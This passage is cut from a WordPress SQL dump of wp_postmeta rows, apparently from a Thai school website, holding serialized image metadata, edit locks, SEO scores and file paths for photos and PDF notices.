(11602, 5150, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1082;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2019/02/51286822_754485364927654_6403831555852075008_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"51286822_754485364927654_6403831555852075008_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"51286822_754485364927654_6403831555852075008_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"51286822_754485364927654_6403831555852075008_o-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"51286822_754485364927654_6403831555852075008_o-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"51286822_754485364927654_6403831555852075008_o-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11607, 5147, '_edit_last', '3'),
(11608, 5152, '_wp_attached_file', '2019/02/51165026_755029704873220_860044978863210496_o.jpg'),
(11609, 5152, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:57:\"2019/02/51165026_755029704873220_860044978863210496_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"51165026_755029704873220_860044978863210496_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"51165026_755029704873220_860044978863210496_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"51165026_755029704873220_860044978863210496_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"51165026_755029704873220_860044978863210496_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"51165026_755029704873220_860044978863210496_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11610, 5147, '_thumbnail_id', '5152'),
(11614, 5147, '_hide_featured', NULL),
(11615, 5147, '_yoast_wpseo_content_score', '30'),
(11616, 5147, '_yoast_wpseo_primary_category', '31'),
(11617, 5147, '_wpas_done_all', '1'),
(11618, 5147, '_jetpack_related_posts_cache', 'a:1:{s:32:\"d739a53b815bf8a2853fb5aad028ac73\";a:2:{s:7:\"expires\";i:1574772510;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:4017;}i:2;a:1:{s:2:\"id\";i:5179;}}}}'),
(11619, 5156, '_edit_lock', '1549853601:3'),
(11620, 5156, '_edit_last', '3'),
(11621, 5157, '_wp_attached_file', '2019/02/51641754_2165937120093147_2374474443415093248_n.jpg'),
(11622, 5157, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:59:\"2019/02/51641754_2165937120093147_2374474443415093248_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"51641754_2165937120093147_2374474443415093248_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"51641754_2165937120093147_2374474443415093248_n-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"51641754_2165937120093147_2374474443415093248_n-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"51641754_2165937120093147_2374474443415093248_n-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11623, 5156, '_thumbnail_id', '5157'),
(11627, 5156, '_hide_featured', NULL),
(11628, 5156, '_yoast_wpseo_content_score', '30'),
(11629, 5156, '_yoast_wpseo_primary_category', '31'),
(11630, 5156, '_wpas_done_all', '1'),
(11631, 5156, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575609717;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4869;}i:1;a:1:{s:2:\"id\";i:4961;}i:2;a:1:{s:2:\"id\";i:5301;}}}}'),
(11632, 5159, '_edit_lock', '1549867282:3'),
(11633, 5159, '_edit_last', '3'),
(11634, 5160, '_wp_attached_file', '2019/02/52594315_2173047412715451_2219177265034428416_n.jpg'),
(11635, 5160, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2019/02/52594315_2173047412715451_2219177265034428416_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"52594315_2173047412715451_2219177265034428416_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"52594315_2173047412715451_2219177265034428416_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"52594315_2173047412715451_2219177265034428416_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"52594315_2173047412715451_2219177265034428416_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11636, 5159, '_thumbnail_id', '5160'),
(11640, 5159, '_hide_featured', NULL),
(11641, 5159, '_yoast_wpseo_content_score', '30'),
(11642, 5159, '_yoast_wpseo_primary_category', '31'),
(11643, 5159, '_wpas_done_all', '1'),
(11644, 5159, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575644959;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5900;}i:1;a:1:{s:2:\"id\";i:4166;}i:2;a:1:{s:2:\"id\";i:6306;}}}}'),
(11645, 5162, '_edit_lock', '1549951723:3'),
(11646, 5162, '_edit_last', '3'),
(11647, 5163, '_wp_attached_file', '2019/02/12-2-2562-13-04-28.png');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(11648, 5163, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:516;s:6:\"height\";i:676;s:4:\"file\";s:30:\"2019/02/12-2-2562-13-04-28.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-2-2562-13-04-28-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"12-2-2562-13-04-28-229x300.png\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-2-2562-13-04-28-229x300.png\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11649, 5164, '_wp_attached_file', '2019/02/51933250_760654664310724_5727922781429956608_o.jpg'),
(11650, 5164, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2019/02/51933250_760654664310724_5727922781429956608_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"51933250_760654664310724_5727922781429956608_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"51933250_760654664310724_5727922781429956608_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"51933250_760654664310724_5727922781429956608_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"51933250_760654664310724_5727922781429956608_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"51933250_760654664310724_5727922781429956608_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11651, 5162, '_thumbnail_id', '5164'),
(11655, 5162, '_hide_featured', NULL),
(11656, 5162, '_yoast_wpseo_content_score', '30'),
(11657, 5162, '_yoast_wpseo_primary_category', '31'),
(11658, 5162, '_wpas_done_all', '1'),
(11659, 5162, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575619345;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3958;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:6320;}}}}'),
(11660, 5166, '_edit_lock', '1549951847:3'),
(11661, 5166, '_edit_last', '3'),
(11662, 5167, '_wp_attached_file', '2019/02/52075994_760673217642202_3105356557253083136_o.jpg'),
(11663, 5167, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2019/02/52075994_760673217642202_3105356557253083136_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52075994_760673217642202_3105356557253083136_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52075994_760673217642202_3105356557253083136_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52075994_760673217642202_3105356557253083136_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52075994_760673217642202_3105356557253083136_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52075994_760673217642202_3105356557253083136_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11664, 5166, '_thumbnail_id', '5167'),
(11668, 5166, '_hide_featured', NULL),
(11669, 5166, '_yoast_wpseo_content_score', '30'),
(11670, 5166, '_yoast_wpseo_primary_category', '31'),
(11671, 5166, '_wpas_done_all', '1'),
(11672, 5169, '_edit_lock', '1549955960:3'),
(11673, 5169, '_edit_last', '3'),
(11674, 5170, '_wp_attached_file', '2019/02/52562680_760692620973595_5197864679698857984_o.jpg'),
(11675, 5170, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2019/02/52562680_760692620973595_5197864679698857984_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52562680_760692620973595_5197864679698857984_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52562680_760692620973595_5197864679698857984_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52562680_760692620973595_5197864679698857984_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52562680_760692620973595_5197864679698857984_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52562680_760692620973595_5197864679698857984_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11676, 5169, '_thumbnail_id', '5170'),
(11680, 5169, '_hide_featured', NULL),
(11681, 5169, '_yoast_wpseo_content_score', '30'),
(11682, 5169, '_yoast_wpseo_primary_category', '31'),
(11683, 5169, '_wpas_done_all', '1'),
(11684, 5166, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574919077;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6312;}i:1;a:1:{s:2:\"id\";i:5388;}i:2;a:1:{s:2:\"id\";i:6334;}}}}'),
(11685, 5169, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575735400;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5194;}i:1;a:1:{s:2:\"id\";i:6322;}i:2;a:1:{s:2:\"id\";i:4265;}}}}'),
(11686, 5172, '_edit_lock', '1550049185:3'),
(11687, 5172, '_edit_last', '3'),
(11688, 5173, '_wp_attached_file', '2019/02/51777753_761364324239758_2985539403625005056_o.jpg'),
(11689, 5173, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/02/51777753_761364324239758_2985539403625005056_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"51777753_761364324239758_2985539403625005056_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"51777753_761364324239758_2985539403625005056_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"51777753_761364324239758_2985539403625005056_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"51777753_761364324239758_2985539403625005056_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"51777753_761364324239758_2985539403625005056_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11690, 5172, '_thumbnail_id', '5173'),
(11694, 5172, '_hide_featured', NULL),
(11695, 5172, '_yoast_wpseo_content_score', '30'),
(11696, 5172, '_yoast_wpseo_primary_category', '31'),
(11697, 5172, '_wpas_done_all', '1'),
(11699, 5172, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575466394;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5939;}i:1;a:1:{s:2:\"id\";i:5900;}i:2;a:1:{s:2:\"id\";i:4991;}}}}'),
(11700, 5176, '_edit_lock', '1550199840:3'),
(11701, 5176, '_edit_last', '3'),
(11702, 5177, '_wp_attached_file', '2019/02/ประกาศ-รายชื่อผู้ชนะราคาจ้างก่อสร้างอาคารเรียน-จำนวน-๑-หลัง.pdf'),
(11706, 5176, '_hide_featured', NULL),
(11707, 5176, '_yoast_wpseo_content_score', '60'),
(11708, 5176, '_yoast_wpseo_primary_category', '3'),
(11709, 5176, '_wpas_done_all', '1'),
(11710, 5179, '_edit_lock', '1550200123:3'),
(11711, 5179, '_edit_last', '3'),
(11712, 5180, '_wp_attached_file', '2019/02/15-2-2562-10-07-38.png'),
(11713, 5180, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:513;s:6:\"height\";i:780;s:4:\"file\";s:30:\"2019/02/15-2-2562-10-07-38.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"15-2-2562-10-07-38-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"15-2-2562-10-07-38-197x300.png\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"15-2-2562-10-07-38-197x300.png\";s:5:\"width\";i:197;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11714, 5181, '_wp_attached_file', '2019/02/52489216_761964967513027_4241378705579966464_o.jpg'),
(11715, 5181, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:58:\"2019/02/52489216_761964967513027_4241378705579966464_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52489216_761964967513027_4241378705579966464_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52489216_761964967513027_4241378705579966464_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52489216_761964967513027_4241378705579966464_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52489216_761964967513027_4241378705579966464_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52489216_761964967513027_4241378705579966464_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11716, 5176, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575385253;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5680;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:5952;}}}}'),
(11717, 5179, '_thumbnail_id', '5181'),
(11721, 5179, '_hide_featured', NULL),
(11722, 5179, '_yoast_wpseo_content_score', '30'),
(11723, 5179, '_yoast_wpseo_primary_category', '31'),
(11724, 5179, '_wpas_done_all', '1'),
(11725, 5179, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575705289;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5291;}i:1;a:1:{s:2:\"id\";i:3971;}i:2;a:1:{s:2:\"id\";i:6156;}}}}'),
(11726, 5184, '_wp_attached_file', '2019/02/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียนระดับ-ปีการศึกษา-2559.pdf'),
(11727, 2418, '_yoast_wpseo_content_score', '60'),
(11728, 5186, '_edit_lock', '1550222952:3'),
(11729, 5186, '_edit_last', '3'),
(11730, 5187, '_wp_attached_file', '2019/02/ประกาศ-ประกวดราคาซื้อครุภัณฑ์ชุดทดลองวงจรอิเล็กทรอนิกส์-จำนวน-๑-ชุด.pdf'),
(11735, 5186, '_hide_featured', NULL),
(11736, 5186, '_yoast_wpseo_content_score', '30'),
(11737, 5186, '_yoast_wpseo_primary_category', '3'),
(11738, 5186, '_wpas_done_all', '1'),
(11739, 5186, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575650760;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4781;}i:1;a:1:{s:2:\"id\";i:4803;}i:2;a:1:{s:2:\"id\";i:4675;}}}}'),
(11741, 5192, '_wp_attached_file', '2019/02/รายงานผลสัมฤทธิ์ทางการเรียน-ปีการศึกษา-2560.pdf'),
(11742, 5194, '_edit_lock', '1550472091:3'),
(11743, 5194, '_edit_last', '3'),
(11744, 5195, '_wp_attached_file', '2019/02/52427928_762542587455265_8475519510797877248_o.jpg'),
(11745, 5195, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1969;s:6:\"height\";i:1313;s:4:\"file\";s:58:\"2019/02/52427928_762542587455265_8475519510797877248_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"52427928_762542587455265_8475519510797877248_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"52427928_762542587455265_8475519510797877248_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"52427928_762542587455265_8475519510797877248_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"52427928_762542587455265_8475519510797877248_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"52427928_762542587455265_8475519510797877248_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(11746, 5194, '_thumbnail_id', '5195'),
(11750, 5194, '_hide_featured', NULL),
(11751, 5194, '_yoast_wpseo_content_score', '30'),
